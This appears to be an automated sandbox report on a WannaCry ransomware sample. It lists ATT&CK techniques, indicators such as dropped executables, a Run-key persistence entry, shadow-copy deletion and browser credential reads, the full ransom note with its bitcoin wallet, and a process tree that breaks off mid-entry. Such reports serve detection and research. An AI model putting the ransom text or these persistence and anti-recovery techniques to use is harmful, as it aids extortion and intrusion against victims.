wannacry | hxxp://one a cry ransome ware

Analysis

max time kernel
226s
max time network
233s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
17/10/2024, 21:03 UTC

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

http://one a cry ransome ware

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@Please_Read_Me@.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD19BA.tmp	WannaCry.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD19D1.tmp	WannaCry.EXE

Executes dropped EXE 17 IoCs

pid	Process
3560	WannaCry.EXE
2728	taskdl.exe
2636	@WanaDecryptor@.exe
3004	@WanaDecryptor@.exe
1996	taskhsvc.exe
5032	taskdl.exe
1744	taskse.exe
1144	@WanaDecryptor@.exe
488	taskdl.exe
796	taskse.exe
2024	@WanaDecryptor@.exe
2020	taskse.exe
2956	@WanaDecryptor@.exe
196	taskdl.exe
4124	taskse.exe
1368	@WanaDecryptor@.exe
3580	taskdl.exe

Loads dropped DLL 7 IoCs

pid	Process
1996	taskhsvc.exe
1996	taskhsvc.exe
1996	taskhsvc.exe
1996	taskhsvc.exe
1996	taskhsvc.exe
1996	taskhsvc.exe
1996	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
3116	icacls.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\xinooffmkqlv074 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
2	camo.githubusercontent.com
2	raw.githubusercontent.com
41	raw.githubusercontent.com
42	camo.githubusercontent.com
49	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp"	WannaCry.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1287768749-810021449-2672985988-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@WanaDecryptor@.bmp"	@WanaDecryptor@.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@WanaDecryptor@.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@WanaDecryptor@.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskhsvc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WannaCry.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@WanaDecryptor@.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@WanaDecryptor@.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@WanaDecryptor@.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	@WanaDecryptor@.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskdl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskse.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "253"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4692	reg.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\WannaCry.EXE:Zone.Identifier	msedge.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3092	WINWORD.EXE
3092	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
4456	msedge.exe
4456	msedge.exe
3264	msedge.exe
3264	msedge.exe
4468	msedge.exe
4468	msedge.exe
3120	identity_helper.exe
3120	identity_helper.exe
1960	msedge.exe
1960	msedge.exe
1996	taskhsvc.exe
1996	taskhsvc.exe
1996	taskhsvc.exe
1996	taskhsvc.exe
1996	taskhsvc.exe
1996	taskhsvc.exe
3076	msedge.exe
3076	msedge.exe
3076	msedge.exe
3076	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe

Suspicious use of AdjustPrivilegeToken 53 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3116	WMIC.exe
Token: SeSecurityPrivilege	3116	WMIC.exe
Token: SeTakeOwnershipPrivilege	3116	WMIC.exe
Token: SeLoadDriverPrivilege	3116	WMIC.exe
Token: SeSystemProfilePrivilege	3116	WMIC.exe
Token: SeSystemtimePrivilege	3116	WMIC.exe
Token: SeProfSingleProcessPrivilege	3116	WMIC.exe
Token: SeIncBasePriorityPrivilege	3116	WMIC.exe
Token: SeCreatePagefilePrivilege	3116	WMIC.exe
Token: SeBackupPrivilege	3116	WMIC.exe
Token: SeRestorePrivilege	3116	WMIC.exe
Token: SeShutdownPrivilege	3116	WMIC.exe
Token: SeDebugPrivilege	3116	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3116	WMIC.exe
Token: SeRemoteShutdownPrivilege	3116	WMIC.exe
Token: SeUndockPrivilege	3116	WMIC.exe
Token: SeManageVolumePrivilege	3116	WMIC.exe
Token: 33	3116	WMIC.exe
Token: 34	3116	WMIC.exe
Token: 35	3116	WMIC.exe
Token: 36	3116	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3116	WMIC.exe
Token: SeSecurityPrivilege	3116	WMIC.exe
Token: SeTakeOwnershipPrivilege	3116	WMIC.exe
Token: SeLoadDriverPrivilege	3116	WMIC.exe
Token: SeSystemProfilePrivilege	3116	WMIC.exe
Token: SeSystemtimePrivilege	3116	WMIC.exe
Token: SeProfSingleProcessPrivilege	3116	WMIC.exe
Token: SeIncBasePriorityPrivilege	3116	WMIC.exe
Token: SeCreatePagefilePrivilege	3116	WMIC.exe
Token: SeBackupPrivilege	3116	WMIC.exe
Token: SeRestorePrivilege	3116	WMIC.exe
Token: SeShutdownPrivilege	3116	WMIC.exe
Token: SeDebugPrivilege	3116	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3116	WMIC.exe
Token: SeRemoteShutdownPrivilege	3116	WMIC.exe
Token: SeUndockPrivilege	3116	WMIC.exe
Token: SeManageVolumePrivilege	3116	WMIC.exe
Token: 33	3116	WMIC.exe
Token: 34	3116	WMIC.exe
Token: 35	3116	WMIC.exe
Token: 36	3116	WMIC.exe
Token: SeBackupPrivilege	2204	vssvc.exe
Token: SeRestorePrivilege	2204	vssvc.exe
Token: SeAuditPrivilege	2204	vssvc.exe
Token: SeTcbPrivilege	1744	taskse.exe
Token: SeTcbPrivilege	1744	taskse.exe
Token: SeTcbPrivilege	796	taskse.exe
Token: SeTcbPrivilege	796	taskse.exe
Token: SeTcbPrivilege	2020	taskse.exe
Token: SeTcbPrivilege	2020	taskse.exe
Token: SeTcbPrivilege	4124	taskse.exe
Token: SeTcbPrivilege	4124	taskse.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe

Suspicious use of SendNotifyMessage 14 IoCs

pid	Process
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe
3264	msedge.exe

Suspicious use of SetWindowsHookEx 18 IoCs

pid	Process
2636	@WanaDecryptor@.exe
3004	@WanaDecryptor@.exe
2636	@WanaDecryptor@.exe
3004	@WanaDecryptor@.exe
1144	@WanaDecryptor@.exe
1144	@WanaDecryptor@.exe
3092	WINWORD.EXE
3092	WINWORD.EXE
3092	WINWORD.EXE
3092	WINWORD.EXE
3092	WINWORD.EXE
3092	WINWORD.EXE
3092	WINWORD.EXE
2024	@WanaDecryptor@.exe
2956	@WanaDecryptor@.exe
1368	@WanaDecryptor@.exe
4336	LogonUI.exe
4336	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3264 wrote to memory of 2652	3264	msedge.exe	79
PID 3264 wrote to memory of 2652	3264	msedge.exe	79
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4272	3264	msedge.exe	80
PID 3264 wrote to memory of 4456	3264	msedge.exe	81
PID 3264 wrote to memory of 4456	3264	msedge.exe	81
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82
PID 3264 wrote to memory of 4556	3264	msedge.exe	82

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4308	attrib.exe
1132	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://one a cry ransome ware
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff918193cb8,0x7ff918193cc8,0x7ff918193cd8
  2⤵
  PID:2652
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
  2⤵
  PID:4272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8
  2⤵
  PID:4556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:4348
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:4028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
  2⤵
  PID:4532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1
  2⤵
  PID:1720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2104 /prefetch:1
  2⤵
  PID:3060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4028 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4468
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:4788
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:3220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
  2⤵
  PID:1872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  2⤵
  PID:4676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4200 /prefetch:1
  2⤵
  PID:2112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,12922782528004759355,5995224218673331504,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:1
  2⤵
  PID:4968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
